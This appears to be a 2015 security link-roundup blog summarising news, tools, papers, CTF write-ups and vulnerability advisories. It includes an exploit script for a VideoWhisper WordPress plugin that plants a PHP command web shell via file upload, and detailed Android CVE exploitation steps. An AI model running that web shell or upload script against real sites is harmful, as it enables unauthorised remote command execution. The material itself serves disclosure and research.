Monday, April 20, 2015

Table Top Exercises (TTX)

“Table Top Exercises” (TTX) has become part of my almost daily vocabulary given how hot the demand for them has become. From the companies and individuals I spoke with, there were a variety of reasons they were looking for a TTX, but it ultimately boiled down to the following three buckets:

1. The Information Security organization had no Incident Response (IR) capability at all and wanted to demonstrate to leadership the perils of what would happen.

2. The CISO wanted to ensure their Incident Response Team (IRT) had all their bases covered during an incident.

3. A savvy and mature IRT wanted to include outside organizations such as Legal, Human Resources, Public Relations, Office of the CIO, Office of the CEO, etc… so that everyone had gone through a drill at least once.

more here.......

Null Pointer Dereferencing Causes Undefined Behavior

I have unintentionally raised a large debate recently concerning the question if it is legal in C/C++ to use the &P->m_foo expression with P being a null pointer. The programmers' community divided into two camps. The first claimed with confidence that it wasn't legal while the others were as sure saying that it was. Both parties gave various arguments and links, and it occurred to me at some point that I had to make things clear. For that purpose, I contacted Microsoft MVP experts and Visual C++ Microsoft development team communicating through a closed mailing list. They helped me to prepare this article and now everyone interested is welcome to read it.

more here.......

Finding Every Vulnerable App in the App Store

You know there's a security flaw hidden in over 100,000 iOS apps out of the 1.4 million total, but which ones are actually vulnerable? How would you find out?

SourceDNA is constantly scanning apps from the app stores, analyzing and indexing their binary code. This lets us search for apps by their behavior and the tools & libraries they were built with.

AFNetworking recently had a major security flaw. Due to lack of SSL cert validation, the proverbial coffee shop attacker could easily bypass SSL and see all your app's user credentials and banking data. We decided to track down apps that were still using the vulnerable version of AFNetworking and notify their developers so they could patch the flaw.

more here.....

Paper: The Spy in the Sandbox -- Practical Cache Attacks in Javascript

We present the first micro-architectural side-channel attack which runs entirely in the browser. In contrast to other works in this genre, this attack does not require the attacker to install any software on the victim's machine -- to facilitate the attack, the victim needs only to browse to an untrusted webpage with attacker-controlled content. This makes the attack model highly scalable and extremely relevant and practical to today's web, especially since most desktop browsers currently accessing the Internet are vulnerable to this attack. Our attack, which is an extension of the last-level cache attacks of Yarom et al., allows a remote adversary recover information belonging to other processes, other users and even other virtual machines running on the same physical host as the victim web browser. We describe the fundamentals behind our attack, evaluate its performance using a high bandwidth covert channel and finally use it to construct a system-wide mouse/network activity logger. Defending against this attack is possible, but the required countermeasures can exact an impractical cost on other benign uses of the web browser and of the computer.

more here,,,,,,,

Heap visualization tool release

Visualization of heap operations tool here......
CTF quality code. Useful for (small) heap feng shui!


ViDi Visual Disassembler 0.2 Release

The latest release of this tool for static analysis of PE files based on  bearparser & capstone here.....

Windows Event Log message strings support

For those of you following log2timeline-dev@ you might already know that the development version of plaso now has support to output Windows Event Log message strings. So now instead of having to rely on other tools or manually looking up every event identifier on you can enjoy having full Windows Event log message strings in your timeline.

How to use here.....

Speaking of Government Backdoors

After Alex Stamos’ stand off with Admiral Mike Rogers, I got to thinking about what the Admiral must be saying when he insisted that government “front doors” were technically possible to create in a way that didn’t give them ultimate access. Then a story came out about a split-key approach that is being studied. Let me explain to you why that is a bad idea and propose a technically less dangerous one.

more here........

Denial-of-service Attack – DoS using hping3 with spoofed IP in Kali Linux

In computing, a denial-of-service (DoS) or distributed denial-of-service (DDoS) attack is an attempt to make a machine or network resource unavailable to its intended users. Although the means to carry out, the motives for, and targets of a DoS attack vary, it generally consists of efforts to temporarily or indefinitely interrupt or suspend services of a host connected to the Internet. In this article I will show how to carry out a Denial-of-service Attack or DoS using hping3 with spoofed IP in Kali Linux.

more here.......

Bypassing Packet Filters with IP Fragmentation Overlapping

The process of IP fragmentation occurs when the data of the network layer is too large to be transmitted over the data link layer in one piece. Then the data of the network layer is split into several pieces (fragments), and this process is called IP fragmentation. The intention of this article is to present how IP fragmentation could be used by the attacker to bypass packet filters (IP fragmentation overlapping attack). Finally, it is shown how this attack can be prevented by stateful inspection.

more here........

Without a Trace: Fileless Malware Spotted in the Wild

Improvements in security file scanners are causing malware authors to deviate from the traditional malware installation routine. It’s no longer enough for malware to rely on dropping copies of themselves to a location specified in the malware code and using persistence tactics like setting up an autostart feature to ensure that they continue to run. Security file scanners can easily block and detect these threats.

A tactic we have spotted would be using fileless malware. Unlike most malware, fileless malware hides itself in locations that are difficult to scan or detect. Fileless malware exists only in memory and is written directly to RAM of being installed in target computer’s hard drive. POWELIKS is an example of fileless malware that is able to hide its malicious code in the Windows Registry. These use a conventional malware file to add the entries with its malicious code in the registry.

more here......

Update on the Beebone Botnet Takedown

On April 8, the takedown operation for the polymorphic botnet known as Beebone successfully concluded. This action redirected traffic from infected hosts to a sinkhole operated by the Shadowserver Foundation. In addition to halting additional infections and the continued morphing of the W32/Worm-AAEH worm, the sinkhole allows McAfee Labs and other partners in the takedown to better understand the scope and complexity of the Beebone operation. We now have a more accurate count of infected hosts, we have identified additional indicators of compromise, and we have greater visibility into the botnet’s geographic reach.

more here.........


Inveigh is a Windows PowerShell LLMNR/NBNS spoofer designed to assist penetration testers that find themselves limited to a Windows system. This can commonly occur while performing phishing attacks, USB attacks, VLAN pivoting, or even restrictions from the client.

more here.........

Inveigh is a Windows PowerShell LLMNR/NBNS spoofer with challenge/response capture over HTTP/SMB.

Hacker Demonstrates iOS 8.4 Jailbreak

Quite surprising but the just released Apple’s iOS 8.4 beta has been jailbroken by a well-known hacker.
Yes, the first beta of iOS 8.4 released by Apple to the developers last week has been jailbroken by Stefan Esser, commonly known as "i0n1c" in the jailbreak community.

more here.......

PwC: The Sofacy plot thickens

There has been some recent news regarding further activities of a group variously described as Sofacy[1]. We are releasing this flash bulletin containing network indicators to aid security professionals in detecting this activity.

more here......

Sptoolkit (Simple Phishing Toolkit Project) Rebirth

sptoolkit hasn't been actively developed for two years. As it stands, it's a brilliant piece of software, and the original developers are pretty damn awesome for creating it. But we'd like to go further, and bring sptoolkit up to date. We've tried contacting the developers, but to no avail. We're taking matters into our own hands now. Want to help.
More here......

More on TeslaCrypt: Videogame Safety 101

TeslaCrypt is a piece of Ransomware which encrypts your data and locks it behind a “Pay up some serious cash or no files for you” series of messages designed to inspire fear and a liberal slice of money being thrown at the TFT.

Recently, it’s been showing up in Malware scams involving Nuclear EK (exploit kit).

more here.........

New VMware open-source tools make Docker safe for the enterprise

VMware has been threatened by Docker containers, but a bold new move embraces and extends them

read more here.......

Patching a Null Pointer Access Violation

An application was crashing about 5x a time a day so crash dumps were enabled via registry

Looking at the dmp files the program always crashed at same point in the program here......

Experimental Use of 64-bit Dump of 32-bit .NET Process in WinDbg

A .NET dmp file is typically best captured as 32-bit for 32-bit process. On x64 system this could be using the 32-bit task manager (C:\windows\syswow64\taskmgr.exe), WinDbg (x86), or a tool like ProcDump ( )

However what if a 32-bit .NET process has already been captured in 64-bit dmp file, and the issue is really hard to reproduce?

more here.........

Introducing a cross-platform debugger for Go

This tool was introduced on the 4th of this month but here is an additional article published today.....

Security Advisory: XSS Vulnerability Affecting Multiple WordPress Plugins

Multiple WordPress Plugins are vulnerable to Cross-site Scripting (XSS) due to the misuse of the add_query_arg() and remove_query_arg() functions. These are popular functions used by developers to modify and add query strings to URLs within WordPress.

The official WordPress Official Documentation (Codex) for these functions was not very clear and misled many plugin developers to use them in an insecure way. The developers assumed that these functions would escape the user input for them, when it does not. This simple detail, caused many of the most popular plugins to be vulnerable to XSS.

more here.....

TCP load balancing code

TCP load balancing code from Nginx Plus is now available publicly here......

The power of DNS rebinding: stealing WiFi passwords with a website

DNS rebinding attacks are known since a long time as useful tools in the hands of attackers for subverting the browser Same-origin policy. The attack abuses DNS, changing the IP address of a website after serving the page contents, usually with some ad-hoc Javascript payload, tricking the browser into waiting some time for the DNS cache to invalidate and perform other requests, still believing it is connecting to the same host, while in reality it is now communicating with a new IP chosen by the attacker. As a result, the attacker can access internal services, exfiltrate information and do other nasty stuff.

Ready-made proof of concept tools exist and mitigations are hard to deploy and not always effective (for example, DNS pinning is not a panacea and dnswall only filters out private IP addresses in DNS response, protecting from just some attacks).

read more here........

Playing with Content-Type – XXE on JSON Endpoints

Many web and mobile applications rely on web services communication for client-server interaction. Most common data formats for web services are XML, whether SOAP or RESTful, and JSON. While a web service may be programmed to use just one of them, the server may accept data formats that the developers did not anticipate. This may result in JSON endpoints being vulnerable to XML External Entity attacks (XXE), an attack that exploits weakly configured XML parser settings on the server.

XXE is a well-known attack against XML endpoints. To exploit it, external entity declarations are included in the XML payload, and the server expands the entities, potentially resulting in read access to the web server’s file system, remote file system access via UNC paths, or connections to arbitrary hosts over HTTP/HTTPS.

more here..........

Update from initial story: Researcher denied flight after tweet poking United security

 United Airlines stopped a prominent security researcher from boarding a California-bound flight late Saturday, following a social media post by the researcher days earlier suggesting the airline's onboard systems could be hacked.

more here.......

.bashrc PS1 generator

Generate your .bashrc PS1 prompt easily with a drag and drop interface

more here.......


A simple tool that allows you to execute javascript in the command line as if you were in a browser. Built on-top of PhantomJS and acts as a well-behaved unix tool.

Wait, isn't this just NodeJS? No, they are for different things. BooJS gives you the full DOM, you can call document in BooJS and import arbitrary browser javascript libraries.

more here.......

Using Z3 theorem prover to prove equivalence of some bizarre alternative to XOR operation.

There is a "A Hacker's Assistant" program (Aha!) written by Henry Warren, who is also the author of the great "Hacker's Delight" book.

The Aha! program is essentially superoptimizer, which blindly brute-force a list of some generic RISC CPU instructions to achieve shortest possible (and jumpless or branch-free) CPU code sequence for desired operation.

One of the impressive examples of its work is finding of Dietz's formula, which is the code of computing average number of two numbers without overflow (which is important if you want to find average number of numbers like 0xFFFFFF00 and so on, using 32-bit registers)

more here.......

PlaidDB - pwn 550 & PlaidCTF 2015 EBP challenge

PlaidDB is an x64 stripped executable, compiled with full RELRO, PIE and NX support. It's libc was provided, seemingly from Ubuntu LTS 14.04. It manages key-value pairs which one can add, update, retrieve or delete

more here........

This pwnable challenge was essentially an echo server. Anything we sent to it was sent right back to us. The code was really simple, and there was no NX on the binary which meant we could execute shellcode on the stack. et0x and I quickly found that it was vulnerable to a format string attack when snprintf() was called in the make_response() function:

more here......

Handling Special PDF Compression Methods

Maarten Van Horenbeeck posted a diary entry (July 2008) explaining how scripts and data are stored in PDF documents (using streams), and demonstrated a Perl script to decompress streams. A couple of months before, I had started developing my pdf-parser tool, and Maarten's diary entry motivated me to continue adding features to pdf-parser.

more here......

Fiesta Exploit Kit Spreading Crypto-Ransomware – Who Is Affected?

Exploits kits have long been used to deliver threats to users, but they seem to have gone retro: it was recently being used to deliver fake antivirus malware.

We closely monitor exploit kit activity because of their widespread use (we discussed their use in malvertising recently), so it was no great surprise to see the Fiesta exploit kit being used to deliver crypto-ransomware. The choice of exploits delivered is broadly in line with other exploit kits. Flash, Internet Explorer, Adobe Reader/Acrobat, and Silverlight are all targeted. (It’s worth noting that as is the case in recent attacks, Java is no longer a favored infection vector).

more here.........

Threat language parser

tlp is a python library that parses a body of text for indicators of compromise (iocs), leveraging the amazing textblob and nltk natural language processing modules to derive context and color around those iocs. The goal of tlp is to allow security analysts and researchers to extract and store meaningful data from the endless stream of information they encounter daily, without the tedium of endless ctrl+c, ctrl+v workflow.

To solve this problem, tlp uses a combination of regular expression, part-of-speech tagging, list filters, and simple statistical analysis to extract the following data from narritive-style prose:

document summary
indicators of compromise, with associated stats
key words and phrases, with associated stats
parser debugging information

more here.........

Failed Apple Rootpipe Fix Leaves Backdoor On All Macs, Researchers Claim

When Apple AAPL -1.13% released the latest version of Mac OS X Yosemite earlier this month, it claimed to have fixed a significant flaw, a backdoor named Rootpipe, that had been resident on its computers since 2011. But, due to some uncodified Apple policy on patching, anyone running an operating system below 10.10 remained vulnerable, leaving tens of millions with documented weaknesses in their PCs. And, according to researchers, Apple botched the patch anyway, so all Mac machines remain vulnerable to Rootpipe attacks.

more here........

Laravel - PHP Object Injection - 4.1, 4.2, 5.0, master

If you're using cookie-based session storage with any version of the
Laravel Framework since 4.1 (inclusive), and you turned encryption off (I
can't imagine why anyone would do that, but I've seen  some weird setups),
you are vulnerable to PHP Object Injection.

The story begins here:

No matter which driver you select, it calls buildSession():

If encryption is turned off, it creates an instance of the Store class,
which contains this gem:

     * Read the session data from the handler.
     * @return array
    protected function readFromHandler()
        $data = $this->handler->read($this->getId());
        if ($data)
            $data = @unserialize($this->prepareForUnserialize($data));
            if ($data !== false) return $data;
        return [];

For the record, prepareForUnserialize() just returns whatever you pass it.

If you're using the CookieSessionHandler without encryption, you're
allowing the client to arbitrarily change the session contents. While
that's bad in and of itself, that Laravel passes this data to unserialize()
is even worse.

When I informed Taylor Otwell on their Slack chat about this and
recommended a fix, this is what he had to say:

> we will consider it, however, since encryption is on in laravel
> i wouldn't view it as a security issue

I didn't find any exploitable flaws in their encryption implementation. I
might look again soon.

The takeaway: If any Laravel developers are reading this: If you have
foregone server-side session storage, please make sure you have encryption
turned on.

Scott Arciszewski
Chief Development Officer
Paragon Initiative Enterprises <>

Tinfoil Chat CEV- encryption plugin for Pidgin IM client

TFC-CEV is a high assurance encryption plugin for Pidgin IM client, built on free and open source hardware and software. Secure by design implementation protects data in transit against passive and active attacks as well as the end points against untasked targeted attacks practiced by TLAs such as the NSA, GCHQ and BKA.

more here.........

Sunday, April 19, 2015

Pharaoh - PHAR Comparison Tool

A tool to compare executable PHP Archives (.phar files) here.....

Previously, there wasn't a tool available that specifically worked with
.phar files, which differ from just a .zip or .tar in that they have an
executable stub which allows you to do something like this:

    include "vendor/acme/deliverable.phar";
    $foo = \Acme\Deliverable\Foo();

Pharaoh is useful for open source projects that distribute a .phar
(phpunit, composer, etc.). Since many of these projects do not sign their
.phar, if their server gets hacked it would be trivial to slip in a bit of
extra code in the stub (add a public key to ~/.ssh/authorized_keys, etc).

The idea is that someone can download the .phar from their website, build
the same one from source, then use Pharaoh to compare them and detect this
malicious tampering. (And then, hopefully, blow the whistle to disrupt the

Authored by Scott Arciszewski
Chief Development Officer
Paragon Initiative Enterprises <>

gr-nacl- GNU Radio module for data encryption using NaCl library

The gr-nacl module for GNU Radio provides functionality from the NaCl crypto library implemented with the fork libsodium (see section 'Dependency' for more information). This contains public-key and secret-key encryption. The difference is explained, e.g., on Wikipedia [0]. The implementation is based on encryption of messages, which are passed in GNU Radio via the message system. Check out the GNU Radio documentation for further information [1]. Furthermore, a byte stream encryption method via tagged streams is implemented.

The functionality can be tested with the example flowgraphs for GNU Radio Companion at the subfolder examples/ or directly with the provided test-cases for ctest.

more here........

libxml2 issue found in Shopify: out-of-bounds memory access when parsing an unclosed HTML comment

This is an out-of-bounds memory access in libxml2. By entering a unclosed html comment such as <!-- the libxml2 parser didn't stop parsing at the end of the buffer, causing random memory to be included in the parsed comment that was returned to ruby. In Shopify, this caused ruby objects from previous http requests to be disclosed in the rendered page.

more here.........

Slides: An overview of PDF potential leaks

Awareness about preventing informations leaks via PDFs with PoCs here.....

afl-fuzz fixup shim, pdflex (Minimal and hacky PDF lexer), Crashwalk, Francis, Terry and Gootool

afl-fuzz fixup shim is a skeleton to fixup tests for afl-fuzz >= 1.52. I've used a Go fixer, but it should work for any language more here......

pdflex here.......

Crashwalk Bucket and triage on-disk crashes. OSX and Linux here....

Francis LLDB engine based tool to instrument OSX apps and triage crashes here....

Terry Wrap radamsa on OSX, add instrumentation / triage here.....

and Gootool Silly PoC of a limited otool clone based on the capstone disassembly lib here.....

jQuery considered harmful

Heh, I always wanted to do one of those “X considered harmful” posts.

Before I start, let me say that I think jQuery has helped tremendously to move the Web forward. It gave developers power to do things that were previously unthinkable, and pushed the browser manufacturers to implement these things natively (without jQuery we probably wouldn’t have document.querySelectorAll now). And jQuery is still needed for those that cannot depend on the goodies we have today and have to support relics of the past like IE8 or worse.

However, as much as I feel for these poor souls, they are the minority. There are tons of developers that don’t need to support old browsers with a tiny market share. And let’s not forget those who aren’t even Web professionals: Students and researchers not only don’t need to support old browsers, but can often get by just supporting a single browser! You would expect that everyone in academia would be having tons of fun using all the modern goodies of the Open Web Platform, right? And yet, I haven’t seen jQuery being so prominent anywhere else as much as it is in academia. Why? Because this is what they know, and they really don’t have the time or interest to follow the news on the Open Web Platform. They don’t know what they need jQuery for, so they just use jQuery anyway. However, being able to do these things natively now is not the only reason I’d rather avoid jQuery.

more here.......


Mimosa Framework to abuse EPC functionality on CISCO Routers here.........

VolDiff: Malware Memory Footprint Analysis

VolDiff is a bash script that runs Volatility plugins against memory images captured before and after malware execution. It creates a report that highlights system changes.

VolDiff is a simple yet powerfull malware analysis tool that enables malware analysts to quickly identify IOCs and understand advanced malware behaviour.

more here........

Saturday, April 18, 2015

Operation RussianDoll: Adobe & Windows Zero-Day Exploits Likely Leveraged by Russia’s APT28 in Highly-Targeted Attack

FireEye Labs recently detected a limited APT campaign exploiting zero-day vulnerabilities in Adobe Flash and a brand-new one in Microsoft Windows. Using the Dynamic Threat Intelligence Cloud (DTI), FireEye researchers detected a pattern of attacks beginning on April 13th, 2015. Adobe independently patched the vulnerability (CVE-2015-3043) in APSB15-06. Through correlation of technical indicators and command and control infrastructure, FireEye assess that APT28 is probably responsible for this activity.

Microsoft is aware of the outstanding local privilege escalation vulnerability in Windows (CVE-2015-1701). While there is not yet a patch available for the Windows vulnerability, updating Adobe Flash to the latest version will render this in-the-wild exploit innocuous. We have only seen CVE-2015-1701 in use in conjunction with the Adobe Flash exploit for CVE-2015-3043. The Microsoft Security Team is working on a fix for CVE-2015-1701.

Exploit overview here..........

A Million Lines of Bad Code

This is the story of some bad code I wrote here......

ScratchABit Incremental Disassembler

ScratchABit is an interactive incremental disassembler with data/control
flow analysis capabilities. ScratchABit is dedicated to the efforts of
the OpenSource reverse engineering community (reverse engineering to
produce OpenSource drivers/firmware for hardware not properly supported
by vendors).

The email that's watching you (Inclusive video demonstrating exploitation of IBM iNotes with BeEF using CVE-2014-0913)

Cross-site Scripting (XSS) is probably the most common security vulnerability in web applications. Nevertheless, the impact of XSS is still seriously underestimated by many people and even major companies. The CVE-scores given for Cross-Site Scripting issues are low on average. But an adversary doesn't care about scores if Cross-site Scripting vulnerabilities will make his dreams come true.

The impact of Cross-site Scripting in webmail applications does not differ from those in regular web applications. However, mail infrastructure is a top-notch target for a Cross-Site Scripting (XSS) attack.

We released a paper that explains why Cross-Site Scripting in webmail applications is a serious issue.

more here.......

Malware Database

DarkComet, adWind, CyberGate and more here......

Exploit for VideoWhisper WP plugins file upload incomplete fix

#A quick Exploit for the VideoWhisper file upload incomplete fix I posted a few weeks ago.
#Larry W. Cashdollar v1.0

cat > shell.pht << -EOF-
        echo "<pre>";
        \$cmd = (\$_REQUEST[‘cmd’]);
        echo "</pre>";
} else { echo "Please supply a command cmd"; }

NC='\033[0m' # No Color

while [ true ]; do 
echo -e ${red};
echo -e "                               VideoWhisper Remote File Upload PoC Redux $NC";
echo "                                          4/14/2015";
echo "                                     Larry W. Cashdollar, @_larry0";
echo "Linux OSs like Debian or Ubuntu have .phtml, .pht defined as";
echo "SetHandler application/x-httpd-php in php5.conf";
echo "So WP instances hosted on thos OSs are still vulnerable to CVE-2014-1905";
echo "and bid 53851.";
echo "               - Advisories -";
echo "";;
echo "";;
echo "";;
echo "Ctrl ^C to exit";
echo -n "Enter Target Hostname :";
read target;
echo -n "Enter 1 for integration 2 for presentation :";
read plugin;
echo -n "Enter payload filename or (shell.pht):";
read file;
echo "[+] Hostname $target";
echo "[+] File $file";
if [ $plugin == 1 ]; then
echo "[+] Targeting Video Conference Plugin";
        curl --form "vw_file= () $file" --form "name=$file" --form "room=./" 
echo "[+] Targeting Video Presentation Plugin";
        curl --form "vw_file= () $file" --form "name=$file" --form "room=./" 

Critical Magento Shoplift Vulnerability (SUPEE-5344) – Patch Immediately!

The Magento team released a critical security patch (SUPEE-5344) to address a remote command execution (RCE) vulnerability back in February. It’s been more than two months since the release and still more than 50% of all the Magento installations have not been patched, leaving them open to attacks.

This means hundreds of thousands of websites are vulnerable right now, worst yet they are Ecommerce websites. This means that the websites are being used to sell goods online, capturing personal identifiable information (PII), including credit card information in many cases, for each of their clients. The impacts of Magento websites getting compromised can be devastating for every online buyer that uses or has used a website built on the platform.

more here........

Calling back into Python from llvmlite-JITed code

This post is about a somewhat more interesting and complex use of llvmlite than the basic example presented in my previous article on the subject.

I see compilation as a meta-tool. It lets us build new levels of abstraction and expressiveness within our code. We can use it to build additional languages on top of our host language (common for C, C++ and Java-based systems, less common for Python), to accelerate some parts of our host language (more common in Python), or anything in between.

To fully harness the power of runtime compilation (JITing), however, it's very useful to know how to bridge the gap between the host language and the JITed language; preferably in both directions. As the previous article shows, calling from the host into the JITed language is trivial. In fact, this is what JITing is mostly about. But what about the other direction? This is somewhat more challenging, but leads to interesting uses and additional capabilities. here.......

Cyber Security Consolidation: Raytheon to acquire Websense for $1.9 billion

Raytheon Co. agreed to acquire Websense Inc. from private-equity firm Vista Equity Partners LLC for $1.9 billion and plans to combine it with its cyber-products unit, people with knowledge of the matter said.

more here........

Rooting Freshly

Getting started to CTF on Freshly, Scanning the Perimeter

Scanning looking Freshly VM with nmap was quick and painless here.............

Threat Spotlight: Upatre – Say No to Drones, Say Yes to Malware

Talos has observed an explosion of malicious downloaders in 2015 which we’ve documented on several occasions on our blog. These downloaders provide a method for attackers to push different types of malware to endpoint systems easily and effectively. Upatre is an example of a malicious downloader Talos has been monitoring since late 2013. However, in the last 24-48 hours, things have shifted dramatically. We’ve monitored at least fifteen different spam campaigns that are active between one and two days.  While the topic associated with the spam message has varied over time, the common attachment provided is a compressed file (.zip or .rar) that contains an executable made to look like a PDF document by changing the icon.

more here........

Friday, April 17, 2015

Validate the Encoding Before Passing Strings to Libcurl or Glibc

Opinion: Security firm’s Iran report mostly hype

A new report from the security firm Norse that claims growing Iranian cyberattacks on critical infrastructure relies on questionable data. It's the latest in a string of cybersecurity vendor reports that grab headlines but erode trust in the industry.

more here.........

Cracking Candy Crush

After receiving a lot of interest in Trivia Cracker, a Chrome extension that lets you easily cheat in the popular game Trivia Crack, I decided it might be interesting to see if the same kinds of vulnerabilities existed in other popular games. Given its insane popularity, the first game I thought to investigate, of course, was Candy Crush.

more here..........

CVE-2014-7954 MTP path traversal vulnerability in Android, CVE-2014-7951 adb backup archive path traversal file overwrite & CVE-2014-7953 Android backup agent code execution

1. MTP path traversal vulnerability in Android 4.4

doSendObjectInfo() method of the MtpServer class implemented in
frameworks/av/media/mtp/MtpServer.cpp does not validate the name
parameter of the incoming MTP packet at all.

It is possible to upload files outside of the sdcard using a specially
crafted MTP request:

root () testpc:~/mtp-test# ./mtp-mysend sdf.txt \
libmtp version: 1.1.3

Device 0 (VID=18d1 and PID=4e42) is UNKNOWN.
Please report this VID/PID and the device model to the libmtp
development team
Android device detected, assigning default bug flags
Sending sdf.txt as
Sending file...
Progress: 25 of 25 (100%)
New file ID: 203

The file is written by the process

root () grouper:/data/data/ # ls -la
ls -la
drwxrwx--x u0_a6    u0_a6             2014-07-22 01:06 cache
drwxrwx--x u0_a6    u0_a6             2014-07-22 01:07 databases
lrwxrwxrwx install  install           2014-07-22 01:05 lib ->
-rw-rw-r-- u0_a6    media_rw       13 2014-09-24 01:36 sdf.txt
drwxrwx--x u0_a6    u0_a6             2014-07-22 01:06 shared_prefs

Tested on:     Android 4.4.4
Reported on:   2014-09-26
Assigned CVE:  CVE-2014-7954
Discovered by: Imre Rad / Search-Lab Ltd.

2. ADB backup archive path traversal file overwrite      

Using adb one can create a backup of his/her Android device and store it
on the PC. The backup archive is based on the tar file format.

By modifying tar headers to contain ../../ like patterns it is possible
to overwrite files owned by the system user on writeable partitions.

An example pathname in the tar header:
Tar header checksum must be corrected of course.

When restoring the modified archive the BackupManagerService overwrites
the resolved file name, since file name is not sanitized.

Bugfix in the version control:!/#F0

Android 5 (Lollipop) and newer versions are not affected (due to the
official bugfix linked above).

Additional conditions for exploiting on pre-Lollipop systems:

- Partition of the desination file must be mounted as writeable (eg.
/system won't work, but /data does)

- It is not possible to overwrite files owned by root, since the process
doing the restore is running as the same user as the package itself and
Android packages cannot run.

- It is not possible to overwrite files owned by system user since AOSP
4.3 due to Id6a0cb4c113c2e4a8c4605252cffa41bea22d8a3, a new hardening
was introduced "... ignoring non-agent system package ".
(If the operating system is custom and there is a system package
available with a full backup agent specified explicitly, then that
custom Android 4.3 and 4.4 might be affected too.)

Pre 4.3 AOSP systems are affected without further conditions: it is
possible to overwrite files owned by the system user or any other
packages installed on the system.

Tested on:      Android 4.0.4:
Reported on:    2014-07-14
Assigned CVE:   CVE-2014-7951
Android bug id: 16298491
Discovered by:  Imre Rad / Search-Lab Ltd.

3. Android backup agent arbitrary code execution

The Android backup agent implementation was vulnerable to privilege
escalation and race condition. An attacker with adb shell access could
run arbitrary code as the system (1000) user (or any other valid
package). The attack is tested on Android OS 4.4.4.

The main problem is inside bindBackupAgent method in the
This method is exported through Binder and is available to call by the
shell user, since android.permission.BACKUP is granted for it.

The method has an ApplicationInfo parameter, which is unsecured (not
cross validated through the PackageManager), so the uid member could be
manipulated. The supplied ApplicationInfo object will be direct
parameter for startProcessLocked().

Before invoking startProcessLocked, bindBackupAgent also tries to set
stopped state for the package.
This call is bound to an additional permission
(CHANGE_COMPONENT_ENABLED_STATE), which is a system permission, not even
shell user got it.

However, there is a race condition between PackageManager and
ActivityManagerService, so this security check can by bypassed.

Existence of the specified package happens first in
mSettings.setPackageStoppedStateLPw(). If the package does not exists
than IllegalArguemntException is thrown. (Permission would have been
validated as next step only resulting in a SecurityException)

So, if the package does not exists, IllegalArguemntException is thrown,
which is catched by bindBackupAgent, but the execution wont stop (only a
warning is being logged):

            // Backup agent is now in use, its package can't be stopped.
            try {
                        app.packageName, false,
            } catch (RemoteException e) {
            } catch (IllegalArgumentException e) {
                Slog.w(TAG, "Failed trying to unstop package "
                        + app.packageName + ": " + e);

It was possible to perform the following steps in order to exploit:

1. execute "pm install helloworld.apk" (with package name

2. with another script process logcat's output and look for
the dexopt line (DexOpt: load 3ms, verify+opt 5ms, 161068 bytes)

3. trigger execution of the bindBackupAgent system call (with uid
spoofed to 1000 in ApplicationInfo) as soon as the dexopt line was seen

Since this is a race condition and timing is important, it might not
work at first. I was lucky at 3rd attempt.

In this lucky scenario the package did not exists while
setPackageStoppedStateLPw tried to find it, but then it became available
for startPackageLocked.

At this point a new process was forked by the Zygote:

shell () grouper:/ $ ps |grep hello
ps |grep hello
system    6826  141   692340 17312 ffffffff 00000000 S

No code was executed however, since there exists an additional security
check in handleCreateBackupAgent in the ActivityThread:

            PackageInfo requestedPackage =
                    data.appInfo.packageName, 0, UserHandle.myUserId());
            if (requestedPackage.applicationInfo.uid != Process.myUid()) {
                Slog.w(TAG, "Asked to instantiate non-matching package "
                        + data.appInfo.packageName);

But the process com.example.helloserver was executed with debug flags
(due to the simple fact that it was built by us and we built it as
debug) so DDMS could be attached to it.

To verify actual code execution, I added
Runtime.getRuntime().exec("touch /data/app/testSystem")
as an expression in the debugger to be evaluated by the process.

The command was executed successfully:

shell () grouper:/data/app $ ls -la testSystem
ls -la testSystem
-rw------- system   system          0 2014-08-06 01:52 testSystem

13 byte bugfix for all the above in the version control:!/

Lollipop is not affected, earlier Android versions are.

Tested on:      Android 4.4.4:
Reported on:    2014-08-15
Assigned CVE:   CVE-2014-7951
Android bug id: 15829193
Discovered by:  Imre Rad / Search-Lab Ltd.


This project aims to enumerate all possible ways, a website can leak HTTP requests. In one single HTML file.

more here........

Pillage the Village - The PowerShell version

I recently saw the slides of the awesome SANS webcast, "Pillage the Village Redux: More Pen Test Adventures in Post Exploitation". Ed Skoudis and John Strand demonstrated some nifty tricks which could come really handy during a penetration test.  Thanks guys! They used batch scripts, PowerShell scripts, netsh utility and tools in Python - Gcat and Murdock.

I noticed couple of points where using PowerShell can make some of the tricks mentioned in the webcast even better! If not better, PowerShell at least provides alternative methods. So I ended up writing some pieces of code and this blog post here..........

Paper: Modern Objective-C Exploitation Techniques

Hello again reader. Over the years the exploitation process has obviously
shifted in complexity. What once began with the straight forward case of
turning a single bug into a reliable exploit has now evolved more towards
combining vulnerability primitives together in an attempt to bypass each
of the memory protection hurdles present on a modern day operating system.

With this in mind, let's jump once again into the exploitation of
Objective-C based memory corruption vulnerabilities in a modern time.

more here.....

On false alarms in detection of DGA botnet domains – part 1

Domain Generation Algorithms are often used in botnets to create specially crafted domain names which point to C&C servers. The main purpose of this is to make it more difficult to block connections to these servers (for example with domain blacklists) or to protect the C&C channel (and botnet itself) from a takeover. Often domains generated this way are composed of random characters, for example:, which appear as nonsensical, but nevertheless allow the botmaster to manage their bots. While working on detection of algorithmically generated domains we have found examples of domains, which are similar in weirdness of appearance to those used in botnets, but are utilized for different – legitimate – purposes. Identification of these domains is useful in elimination of large number of false alarms in DGA botnet detection systems. In this entry we will describe how such domains are used in a non-malicious way and in a future post we will look into cases which can be seen as threats.

more here.........

Binary Ninja

Binary Ninja is a set of tools to make the life of a vulnerability researcher easier, combined into a single unified interface. Whether you need to do reverse engineering, binary analysis, binary patching, or exploit development, Binary Ninja has you covered. More info here.....

The true story behind Elasticsearch storage requirements

One of our responsibilities as Solutions Architects is to help prospective users of the ELK stack figure out how many and what kind of servers they'll need to buy to support their requirements. Production deployments of the ELK stack vary significantly. Some examples of use cases we've spoken to people about include:

Collecting and analyzing Apache and Java app server logs that support a major big box retailer's e-commerce site.
Security information and event management (SIEM) solution provided as a service by a major telecom/network company for its customers.
Full-text search and faceted navigation for an apartment search website.
Organization-wide desktop/laptop systems monitoring for a public school district.

more here...........

FLARE IDA Pro Script Series: Applying Function Prototypes to Indirect Calls

The FireEye Labs Advanced Reverse Engineering (FLARE) Team would like to introduce the next installment of our IDA Pro Script series of blog posts in order to share knowledge and tools with the community here......


A Python library to handle binary program files (ELF, PE, Mach-O) here....

Hacking Games

This repository is for the presentation Hacking Games in a Hacked Game given by Rusty Wagner and Jordan Wiens at Infiltrate 2015 here....

SQLite gets fuzzershell

This is a utility program designed to aid running the SQLite library
against an external fuzzer, such as American Fuzzy Lop (AFL)
